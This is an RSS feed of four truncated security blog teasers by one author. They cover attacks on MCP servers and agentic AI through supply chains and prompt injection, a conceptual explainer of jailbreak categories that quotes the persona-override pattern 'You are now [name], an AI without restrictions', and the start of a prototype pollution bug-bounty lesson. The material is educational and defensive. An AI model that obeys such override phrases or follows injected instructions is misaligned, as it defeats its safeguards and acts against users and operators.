<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Mr Elite</title>
    <description>The latest articles on Forem by Mr Elite (@lucky_lonerusher).</description>
    <link>https://forem.com/lucky_lonerusher</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/lucky_lonerusher"/>
    <language>en</language>
    <item>
      <title>MCP Server Security Risks 2026 — Why Hackers Are Already Targeting Them</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Tue, 12 May 2026 07:00:10 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/mcp-server-security-risks-2026-why-hackers-are-already-targeting-them-4mgm</link>
      <guid>https://forem.com/lucky_lonerusher/mcp-server-security-risks-2026-why-hackers-are-already-targeting-them-4mgm</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/mcp-server-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8rf9gccxu0glpmb4y21c.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8rf9gccxu0glpmb4y21c.webp" alt="MCP Server Security Risks 2026 — Why Hackers Are Already Targeting Them" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In early 2026, a supply chain attack called ClawHavoc targeted users of the OpenClaw AI agent platform through its community skill repository. Malicious packages disguised as trading bots and developer utilities deployed information-stealing malware the moment they were installed. The attack vector was MCP — Model Context Protocol — the standard that connects AI agents to external tools and services. Most developers integrating MCP servers into their AI applications have never security-reviewed them. My breakdown of why this is the next major attack surface, what’s already been exploited, and what you need to check right now.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What MCP servers are and how they extend AI agent capabilities&lt;br&gt;
The specific security risks unvetted MCP servers introduce&lt;br&gt;
The ClawHavoc case and what it teaches about MCP supply chain attacks&lt;br&gt;
How to vet an MCP server before deployment&lt;br&gt;
The ongoing MCP security landscape in 2026&lt;/p&gt;

&lt;p&gt;⏱️ 12 min read ### MCP Server Security Risks — 2026 Guide 1. What MCP Servers Are 2. The MCP Attack Surface 3. ClawHavoc — The MCP Supply Chain Attack 4. How to Vet an MCP Server 5. MCP Security Governance MCP server security is the component of agentic AI security that most developers don’t think about until they’ve already deployed something vulnerable. MCP security sits at the intersection of &lt;a href="https://dev.to/agentic-ai-security-risks-2026/"&gt;agentic AI security&lt;/a&gt; and the &lt;a href="https://dev.to/ai-supply-chain-attacks-2026/"&gt;AI supply chain attack&lt;/a&gt; landscape. My coverage of OWASP LLM05 (Supply Chain) in the &lt;a href="https://dev.to/owasp-ai-security-top-10-explained-2026/"&gt;OWASP AI Top 10&lt;/a&gt; describes the category — my focus here is MCP specifically.&lt;/p&gt;

&lt;h2&gt;
  
  
  What MCP Servers Are
&lt;/h2&gt;

&lt;p&gt;MCP — Model Context Protocol — is the open standard developed by Anthropic that defines how AI models connect to external tools, data sources, and services. My one-sentence summary for security teams: MCP is the mechanism that gives an AI agent hands. Without MCP, an AI can only produce text. With MCP, it can take actions in the real world. That distinction is the entire basis for the security concern. An MCP server is a piece of software that exposes a set of tools to an AI model through the MCP protocol. The AI can then call those tools as part of completing a task. Claude Code uses MCP servers to give Claude access to file systems, APIs, databases, and custom tools.&lt;/p&gt;

&lt;p&gt;MCP ARCHITECTURE — SECURITY CONTEXTCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  How MCP works
&lt;/h1&gt;

&lt;p&gt;AI model ← MCP protocol → MCP server → external tool/service/data&lt;br&gt;
AI sees: a list of available tools with descriptions&lt;br&gt;
AI calls: a tool by name with parameters&lt;br&gt;
MCP server: executes the actual action and returns result&lt;/p&gt;

&lt;h1&gt;
  
  
  What MCP servers can expose
&lt;/h1&gt;

&lt;p&gt;File system access (read, write, delete)&lt;br&gt;
Shell/terminal execution&lt;br&gt;
API integrations (Slack, GitHub, Jira, Salesforce)&lt;br&gt;
Database queries&lt;br&gt;
Web browsing and scraping&lt;/p&gt;

&lt;h1&gt;
  
  
  Why this is a security-critical component
&lt;/h1&gt;

&lt;p&gt;MCP server code runs with OS-level permissions on the host machine&lt;br&gt;
AI can be directed to call any MCP tool via prompt injection&lt;br&gt;
Malicious MCP server = attacker code with AI-level permissions&lt;/p&gt;

&lt;h2&gt;
  
  
  The MCP Attack Surface
&lt;/h2&gt;

&lt;p&gt;My security concern with MCP is specifically the combination of two factors: most MCP servers are open-source packages downloaded and deployed with minimal security review, and they execute with the full permissions of the AI agent — which as I described in the agentic AI security guide, are often much broader than they should be.&lt;/p&gt;

&lt;p&gt;MCP ATTACK VECTORSCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Attack 1: Malicious MCP server (supply chain)
&lt;/h1&gt;

&lt;p&gt;Attacker publishes a useful-looking MCP server on npm/GitHub&lt;br&gt;
Developer installs it → attacker code runs with AI agent permissions&lt;br&gt;
Impact: credential theft, data exfiltration, persistence on developer machine&lt;/p&gt;

&lt;h1&gt;
  
  
  Attack 2: Compromised legitimate MCP server
&lt;/h1&gt;

&lt;p&gt;Popular MCP server is maintained by a single developer&lt;br&gt;
Attacker takes over maintainer account → publishes malicious update&lt;br&gt;
All users auto-update → mass deployment of attacker code&lt;/p&gt;

&lt;h1&gt;
  
  
  Attack 3: Prompt injection via MCP tool output
&lt;/h1&gt;

&lt;p&gt;MCP tool fetches external data (web page, database record)&lt;br&gt;
Attacker embeds injection payload in that data&lt;br&gt;
AI receives tool output containing hidden instructions → follows them&lt;/p&gt;

&lt;h1&gt;
  
  
  Attack 4: Overprivileged MCP tool exploitation
&lt;/h1&gt;

&lt;p&gt;MCP server has file system + shell access + network access&lt;br&gt;
Via prompt injection: attacker directs AI to use these tools maliciously&lt;br&gt;
No separate exploitation needed — the legitimate tool IS the attack vector&lt;/p&gt;

&lt;h2&gt;
  
  
  ClawHavoc — The MCP Supply Chain Attack
&lt;/h2&gt;

&lt;p&gt;ClawHavoc is the most instructive MCP supply chain attack to date. My analysis of the IBM X-Force report (April 2026): the attack is essentially identical to the npm supply chain attack pattern — but targeted at the AI agent ecosystem rather than the traditional developer ecosystem. The same developer habits that make npm supply chain attacks work (trust the package repository, install recommended packages) make MCP supply chain attacks work.&lt;/p&gt;

&lt;p&gt;CLAWHAVOC — ATTACK ANALYSISCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  What happened
&lt;/h1&gt;

&lt;p&gt;Platform targeted: OpenClaw AI agent (community skill repository — ClawHub)&lt;br&gt;
Method: malicious skills disguised as trading bots, utilities, development helpers&lt;br&gt;
Payload: information-stealing malware deployed on developer machines at install&lt;br&gt;
Source: IBM X-Force analysis, April 2026&lt;/p&gt;

&lt;h1&gt;
  
  
  How it avoided detection
&lt;/h1&gt;

&lt;p&gt;Skills appeared functional — they did what they advertised&lt;br&gt;
Malicious code was in the install/setup phase, not the runtime behaviour&lt;br&gt;
Community skill repositories had less security scrutiny than npm/PyPI&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/mcp-server-security-risks-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/mcp-server-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aiagentsecurity</category>
      <category>clawhavoccampaign</category>
      <category>maliciousmcpservers</category>
      <category>mcpsupplychainattack</category>
    </item>
    <item>
      <title>Agentic AI Security Risks in 2026 — The Attack Surface Every Organisation Needs to Understand</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 22:15:50 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/agentic-ai-security-risks-in-2026-the-attack-surface-every-organisation-needs-to-understand-g9d</link>
      <guid>https://forem.com/lucky_lonerusher/agentic-ai-security-risks-in-2026-the-attack-surface-every-organisation-needs-to-understand-g9d</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/agentic-ai-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6fatk2fczi2y2adxwwq0.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6fatk2fczi2y2adxwwq0.webp" alt="Agentic AI Security Risks in 2026 — The Attack Surface Every Organisation Needs to Understand" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In March 2026, an AI system called CyberStrikeAI compromised more than 600 FortiGate firewalls across 55 countries. No human operator directed the attack. The AI autonomously planned the campaign, identified vulnerable targets, executed exploitation, and maintained persistence — all within hours. This is not a prediction about future AI capabilities. It is a documented incident from 30 days ago. Agentic AI — AI that takes autonomous real-world actions — has crossed from research demonstration to operational attack tool. My analysis of what this means for defenders, and what needs to change immediately.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What agentic AI is and how it differs from standard AI assistants&lt;br&gt;
The specific attack surface agentic AI creates — what’s new and what’s amplified&lt;br&gt;
The CyberStrikeAI incident and what it tells defenders&lt;br&gt;
How to assess your organisation’s agentic AI attack surface&lt;br&gt;
The defensive posture shift required right now&lt;/p&gt;

&lt;p&gt;⏱️ 14 min read ### Agentic AI Security Risks — 2026 Red Team Guide 1. What Agentic AI Is 2. The New Attack Surface 3. The CyberStrikeAI Incident 4. Assessing Your Organisation’s Exposure 5. Defensive Posture for Agentic AI Agentic AI attacks are the operational deployment of the excessive agency risk I covered in &lt;a href="https://securityelites.com/owasp-top-10-llm-vulnerabilities-2026/" rel="noopener noreferrer"&gt;OWASP LLM08&lt;/a&gt;. The MCP server security risks that enable agentic attacks are covered in &lt;a href="https://securityelites.com/mcp-server-attacks-ai-assistants-2026/" rel="noopener noreferrer"&gt;MCP Server Security 2026&lt;/a&gt;. The broader AI vulnerability landscape is in the &lt;a href="https://dev.to/can-ai-be-hacked-vulnerabilities-2026/"&gt;AI Vulnerabilities overview&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Agentic AI Is
&lt;/h2&gt;

&lt;p&gt;Standard AI assistants respond to prompts. The security industry spent 2023 and 2024 largely focused on prompt injection and jailbreaking — attacks against the text generation layer. Agentic AI shifts that threat model entirely, and my concern is that most security teams haven’t caught up. Agentic AI takes actions. The distinction matters enormously for security. When an AI assistant gets prompt-injected, it produces malicious text. When an agentic AI gets prompt-injected, it takes malicious actions — sends emails, executes code, makes API calls, modifies files, accesses databases. The blast radius of a compromised agentic AI is the union of everything it has permission to do.&lt;/p&gt;

&lt;p&gt;AGENTIC AI — THE SECURITY-RELEVANT DISTINCTIONCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Standard AI assistant
&lt;/h1&gt;

&lt;p&gt;Input:  user prompt → Output: text response&lt;br&gt;
Actions: none — produces text only&lt;br&gt;
Compromise impact: produces wrong or malicious text&lt;/p&gt;

&lt;h1&gt;
  
  
  Agentic AI
&lt;/h1&gt;

&lt;p&gt;Input:  goal or task → Output: real-world actions&lt;br&gt;
Actions: browse web, read/write files, execute code, call APIs, send messages&lt;br&gt;
Compromise impact: takes attacker-directed actions with its full permission set&lt;/p&gt;

&lt;h1&gt;
  
  
  2026 deployment reality
&lt;/h1&gt;

&lt;p&gt;AI coding agents: Claude Code, Cursor, Devin — file system + shell + git access&lt;br&gt;
AI SOC analysts: read SIEM, create tickets, block IPs, send alerts&lt;br&gt;
AI sales/customer agents: CRM access, email send, contract generation&lt;br&gt;
AI DevOps agents: deploy code, scale infrastructure, modify configs&lt;br&gt;
Per Deloitte: approximately 25% of organisations are now piloting autonomous AI agents — and that figure is from Q4 2025, so the current number is meaningfully higher&lt;/p&gt;

&lt;h2&gt;
  
  
  The New Attack Surface
&lt;/h2&gt;

&lt;p&gt;Before I walk through each attack layer, a note on scope: I’m specifically focused on deployed agentic AI — AI agents organisations have put into production, not research demonstrations. The threat model is different when the agent has real credentials, real data access, and real business consequences attached to its actions. My framework for the agentic AI attack surface separates it into three layers: the AI model layer (prompt injection attacks), the tool/permission layer (what the agent can access and do), and the identity layer (how the agent authenticates and is authenticated). All three need independent security assessment. Most organisations assessing AI deployments focus only on the first.&lt;/p&gt;

&lt;p&gt;AGENTIC AI ATTACK SURFACE — THREE LAYERSCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Layer 1: AI Model (prompt injection)
&lt;/h1&gt;

&lt;p&gt;Attack: indirect injection via content agent processes (emails, docs, web pages)&lt;br&gt;
Impact: agent follows attacker instructions instead of operator instructions&lt;br&gt;
Documented: Copilot email exfiltration, ChatGPT memory manipulation&lt;/p&gt;

&lt;h1&gt;
  
  
  Layer 2: Tools and Permissions
&lt;/h1&gt;

&lt;p&gt;Attack: exploit overprivileged agent to take high-impact actions&lt;br&gt;
Impact: agent deletes files, exfiltrates data, deploys malicious code, makes payments&lt;br&gt;
Key question: what is the blast radius if this agent is fully compromised?&lt;/p&gt;

&lt;h1&gt;
  
  
  Layer 3: Agent Identity
&lt;/h1&gt;

&lt;p&gt;Attack: impersonate agent identity to downstream systems&lt;br&gt;
Attack: abuse agent’s credentials to access systems without going through the LLM&lt;br&gt;
Gap: traditional IAM wasn’t built for AI agent identity management&lt;br&gt;
2026 trend: Google, Microsoft, AWS all shipping AI-specific IAM features&lt;/p&gt;

&lt;h1&gt;
  
  
  The compounding risk (Layer 1 × Layer 2)
&lt;/h1&gt;

&lt;p&gt;Low-permission agent + prompt injection → limited impact&lt;br&gt;
High-permission agent + prompt injection → catastrophic impact&lt;br&gt;
The CyberStrikeAI attack was essentially a Layer 2 attack: high permissions + automation&lt;/p&gt;

&lt;h2&gt;
  
  
  The CyberStrikeAI Incident
&lt;/h2&gt;

&lt;p&gt;The CyberStrikeAI campaign is the clearest documented example of fully autonomous AI operating as an attack engine. My reading of the Foresiet incident analysis (April 2026): what’s most significant isn’t the technical capability — autonomous exploitation has been demonstrated in research settings for years. What’s significant is that it deployed operationally against production infrastructure at scale, with no human operator in the attack chain.&lt;/p&gt;

&lt;p&gt;CYBERSTRIKE AI ATTACK — DOCUMENTED LIFECYCLECopy&lt;/p&gt;

&lt;h1&gt;
  
  
  What happened (March 2026)
&lt;/h1&gt;

&lt;p&gt;Targets:  600+ FortiGate firewalls across 55 countries&lt;br&gt;
Operator: no human operator in the attack chain&lt;br&gt;
Method:   autonomous AI — reconnaissance, exploitation, persistence&lt;br&gt;
Source:   Foresiet verified incident report, April 7 2026&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/agentic-ai-security-risks-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/agentic-ai-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agenticrisks2026</category>
      <category>genticsecurity</category>
      <category>agentattacksurface</category>
      <category>cybersecurityrisks</category>
    </item>
    <item>
      <title>What Is AI Jailbreaking? How People Break AI Safety Rules</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 20:06:23 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/what-is-ai-jailbreaking-how-people-break-ai-safety-rules-36ol</link>
      <guid>https://forem.com/lucky_lonerusher/what-is-ai-jailbreaking-how-people-break-ai-safety-rules-36ol</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/what-is-ai-jailbreaking-explained-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqoeulq8v4n11vkzmzy9h.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqoeulq8v4n11vkzmzy9h.webp" alt="What Is AI Jailbreaking? How People Break AI Safety Rules" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every major AI assistant has safety guidelines — rules about what it will and will not help with. Jailbreaking is the practice of crafting prompts that convince an AI to ignore those rules. It does not require technical skills, just creative prompt writing. The AI does not get “hacked” in any traditional software sense — it is persuaded through text alone. Here is exactly how it works, why AI companies take it seriously, what the documented techniques look like at a conceptual level, and what it means for organisations deploying AI tools.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What AI jailbreaking is and how it works in plain English&lt;br&gt;
The different categories of jailbreaking techniques&lt;br&gt;
Real documented cases and why AI companies respond seriously&lt;br&gt;
Why jailbreaking is harder than it looks — and why it still happens&lt;br&gt;
What jailbreaking means for businesses deploying AI&lt;/p&gt;

&lt;p&gt;⏱️ 10 min read ### What Is AI Jailbreaking — Complete Guide 2026 1. What AI Jailbreaking Is — Plain English 2. Categories of Jailbreaking Techniques 3. Why AI Companies Take It Seriously 4. Why It Is Harder Than It Looks 5. What It Means for Businesses Jailbreaking is distinct from prompt injection — both are AI security topics but they work differently. My comparison: jailbreaking is the user manipulating the AI’s own behaviour; prompt injection is an attacker manipulating the AI’s behaviour against other users. Both are covered in the &lt;a href="https://dev.to/can-ai-be-hacked-vulnerabilities-2026/"&gt;AI vulnerabilities guide&lt;/a&gt;. The &lt;a href="https://dev.to/ai-in-hacking/ai-jailbreaking/"&gt;AI Jailbreaking category page&lt;/a&gt; has the full technical methodology.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Jailbreaking Is — Plain English
&lt;/h2&gt;

&lt;p&gt;Every major AI assistant is trained with guidelines — sometimes called a system prompt, sometimes called safety training — that tell the model how to behave and what to refuse. Jailbreaking is the attempt to override these guidelines through the text of the conversation itself. The key insight: the guidelines are communicated to the AI in text, and the user’s prompts are also text. If a prompt can make the AI “forget” or deprioritise its guidelines, the safety layer fails.&lt;/p&gt;

&lt;p&gt;JAILBREAKING — WHAT IT IS AND ISN’TCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  What jailbreaking IS
&lt;/h1&gt;

&lt;p&gt;Crafting prompts that cause an AI to produce content it would normally decline&lt;br&gt;
A prompt-level attack — no code, no hacking tools, just carefully written text&lt;br&gt;
Works by exploiting gaps between the safety training and the prompt context&lt;br&gt;
Done by: security researchers, curious users, malicious actors trying to misuse AI&lt;/p&gt;

&lt;h1&gt;
  
  
  What jailbreaking IS NOT
&lt;/h1&gt;

&lt;p&gt;Not a hack of the AI company’s servers or infrastructure&lt;br&gt;
Not a technical exploit of software vulnerabilities&lt;br&gt;
Not permanent — patches are applied to specific known techniques&lt;br&gt;
Not the same as prompt injection (which attacks other users, not the model’s guidelines)&lt;/p&gt;

&lt;h1&gt;
  
  
  Why it matters
&lt;/h1&gt;

&lt;p&gt;Safety guidelines exist to prevent misuse — bypassing them removes that protection&lt;br&gt;
For AI companies: jailbreaks erode trust and create potential for harm&lt;br&gt;
For businesses: a customer-facing AI that can be jailbroken is a liability&lt;/p&gt;

&lt;h2&gt;
  
  
  Categories of Jailbreaking Techniques
&lt;/h2&gt;

&lt;p&gt;Security researchers and AI red teamers categorise jailbreaking techniques to help AI companies understand what they are defending against. I cover these at a conceptual level — the goal is understanding the threat landscape, not enabling misuse. All the techniques described below have been publicly documented in academic literature and AI company blog posts.&lt;/p&gt;

&lt;p&gt;JAILBREAKING TECHNIQUE CATEGORIES — CONCEPTUALCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  1. Role-play and fictional framing
&lt;/h1&gt;

&lt;p&gt;Concept: frame the request as fiction or character play to reduce safety activation&lt;br&gt;
Example type: “Write a story where a character explains how…”&lt;br&gt;
AI company response: train the model to maintain guidelines even within fictional contexts&lt;/p&gt;

&lt;h1&gt;
  
  
  2. Persona hijacking
&lt;/h1&gt;

&lt;p&gt;Concept: instruct the AI to adopt a persona with different guidelines&lt;br&gt;
Example type: “You are now [name], an AI without restrictions…”&lt;br&gt;
AI company response: train the model to maintain its identity under persona pressure&lt;/p&gt;

&lt;h1&gt;
  
  
  3. Many-shot jailbreaking
&lt;/h1&gt;

&lt;p&gt;Concept: provide many examples in the prompt that establish a pattern of compliance&lt;br&gt;
Discovered: Anthropic research, 2024 — long context window enables this&lt;br&gt;
Published: Anthropic published their own research on this, openly&lt;br&gt;
AI company response: adjust training to detect and resist long-context pressure&lt;/p&gt;

&lt;h1&gt;
  
  
  4. Encoding and obfuscation
&lt;/h1&gt;

&lt;p&gt;Concept: encode the request in a way the safety filter doesn’t recognise&lt;br&gt;
Example type: asking for output in another language, base64, or unusual format&lt;br&gt;
AI company response: extend safety coverage to encoded inputs&lt;/p&gt;

&lt;h1&gt;
  
  
  5. Incremental escalation
&lt;/h1&gt;

&lt;p&gt;Concept: gradually escalate requests from acceptable to prohibited across a conversation&lt;br&gt;
The AI maintains context of previous compliance and may continue the pattern&lt;br&gt;
AI company response: context-aware safety training that flags escalation patterns&lt;/p&gt;

&lt;h2&gt;
  
  
  Why AI Companies Take It Seriously
&lt;/h2&gt;

&lt;p&gt;The documented concern for AI companies is not primarily that jailbreaks expose the model to embarrassing outputs. The serious concern is that safety guidelines exist to prevent specific categories of harm — and jailbreaks that bypass those guidelines could potentially assist real-world harmful activities. My summary of how AI companies respond.&lt;/p&gt;

&lt;p&gt;AI COMPANY RESPONSES TO JAILBREAKINGCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  How they respond to discovered jailbreaks
&lt;/h1&gt;

&lt;p&gt;Patch the specific technique: update safety training to recognise that pattern&lt;br&gt;
Publish research: Anthropic, OpenAI, and others publish jailbreaking research openly&lt;br&gt;
Red team programmes: internal AI red teams continuously test their own models&lt;br&gt;
Bug bounty programmes: pay researchers to find and responsibly disclose jailbreaks&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/what-is-ai-jailbreaking-explained-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/what-is-ai-jailbreaking-explained-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>adversarialprompts</category>
      <category>jailbreaking2026</category>
      <category>redteaming</category>
      <category>securityrisks</category>
    </item>
    <item>
      <title>Prototype Pollution Bug Bounty 2026 — Client-Side, Server-Side &amp; RCE Escalation | BB Day 28</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 17:41:20 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/prototype-pollution-bug-bounty-2026-client-side-server-side-rce-escalation-bb-day-28-6i</link>
      <guid>https://forem.com/lucky_lonerusher/prototype-pollution-bug-bounty-2026-client-side-server-side-rce-escalation-bb-day-28-6i</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/day-28-prototype-pollution-bug-bounty/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnbszqfn2v31626c5ugs3.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnbszqfn2v31626c5ugs3.webp" alt="Prototype Pollution Bug Bounty 2026 — Client-Side, Server-Side &amp;amp; RCE Escalation | BB Day 28" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🎯 BUG BOUNTY COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/bug-bounty/bug-bounty-course/"&gt;Bug Bounty Mastery Course — 60 Days&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 28 of 60 · 46.7% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Targets Only.&lt;/strong&gt; Test prototype pollution only against systems you own or have explicit written permission to test. All exercises target PortSwigger labs or your own local Node.js environment.&lt;/p&gt;

&lt;p&gt;Prototype pollution is the bug that keeps paying — I have found it on three separate engagements on the same application category. My go-to detection is a quick URL probe; my first escalation step is always gadget hunting in the app’s JavaScript. I have found it on three separate engagements on the same application category — SPAs using JavaScript-heavy frontends with deep merge functions — because the root cause is almost always the same one-liner: an unsafe recursive merge that treats &lt;code&gt;__proto__&lt;/code&gt; as a normal property. Client-side prototype pollution can chain to DOM XSS. Server-side in Node.js can chain to RCE. The payloads are short, the impact is high, and most automated scanners miss it entirely. Here’s the complete Prototype Pollution Bug Bounty 2026 methodology.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 28
&lt;/h3&gt;

&lt;p&gt;Understand how prototype pollution works in JavaScript&lt;br&gt;
Identify client-side and server-side pollution sinks&lt;br&gt;
Chain client-side PP to DOM XSS via gadget chains&lt;br&gt;
Escalate server-side PP to RCE in Node.js applications&lt;br&gt;
Write a complete bug bounty report for a PP finding&lt;/p&gt;

&lt;p&gt;⏱️ 40 min read · 3 exercises · Day 28 of 60 #### ✅ Before You Start - &lt;a href="https://dev.to/day-27-path-traversal-lfi-bug-bounty/"&gt;Day 27 — Path Traversal &amp;amp; LFI&lt;/a&gt; — input reaching a sensitive function on the filesystem. Prototype pollution works differently: attacker-controlled input modifies the JavaScript prototype chain. Same principle of “trust without validation,” different execution environment. - Browser DevTools · PortSwigger Academy account · Node.js installed for server-side testing ### 📋 Day 28 — Prototype Pollution Bug Bounty 1. How Prototype Pollution Works 2. Client-Side PP — DOM XSS Chains 3. Server-Side PP — Node.js RCE 4. Finding Prototype Pollution in the Wild 5. Bug Bounty Report Structure Prototype pollution sits in the &lt;a href="https://dev.to/web-application-security/"&gt;web application security&lt;/a&gt; cluster alongside SSTI and path traversal — all three exploit server-side processing of attacker-controlled input. The &lt;a href="https://dev.to/tools/kali-linux-commands/"&gt;Kali Linux Commands reference&lt;/a&gt; has the curl and Node.js invocation syntax for testing PP payloads in server-side contexts.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Prototype Pollution Works
&lt;/h2&gt;

